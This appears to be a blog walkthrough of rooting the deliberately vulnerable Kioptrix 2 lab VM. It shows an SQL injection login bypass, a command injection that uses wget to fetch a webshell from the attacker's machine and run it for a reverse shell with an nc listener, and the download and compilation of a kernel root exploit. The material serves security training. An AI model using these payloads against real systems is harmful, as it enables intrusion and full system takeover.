Rooting Kioptrix 2 Walkthrough

Overview

Kioptrix 2 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap

Vulnerabilities Exploited:

  • SQL Injection
  • Command Execution
  • Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root

Reconnaissance/ Scanning

#netdiscover

Target VM IP Address: 192.168.8.105

nmap -p- -A –webxml -oX nmap-kioptrix2.xml 192.168.8.105

Nmap findings:

Found website is running on port 80.

Exploitation:

Found sql injection in website.

“admin’ or 1=1 — -”

“garbag”

Found command execution. Our goal is to upload webshell. We need to find utility that will download our webshell, either wget, nc, etc… and a writable direcotyr.

127.0.0.1; pwd; ls -al; id; whereis wget

wget is available on server. We can use wget to download webshell over server. but we can not upload webshell in /var/ww/html? coz, this directory is owned by root, and everyone does not have access to write to this directory. No problem, we can use /tmp for webshell uploading with this command.

#127.0.0.1; wget 192.168.8.104/shell.txt -O /tmp/shell.php; php /tmp/shell.php

But before executing above command in lets configure webshell with reverse ip address to our kali linux machine and start web server as:

#service apache2 start

and also, nc listener

#nc -nvlp 1234

execute command

Received interactive shell.

Privilege Escalation

Lets check operating system and kernel version, and check if any exploit is available.

I dont know, why each character is typed 2 times 😦

Search through exploitdb found exploit for centos 4.5

Move to exploit directory and start SimpleHTTPServer python module as:

#cd /usr/share/exploitdb/exploits/linux_x86/local/

#python -m SimpleHTTPServer 8888

and on target VM download exploit code,

#wget http://192.168.8.104:8888/9542.c

#gcc 9542.c

#./a.out

Congrats! We are root!!!

References:

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s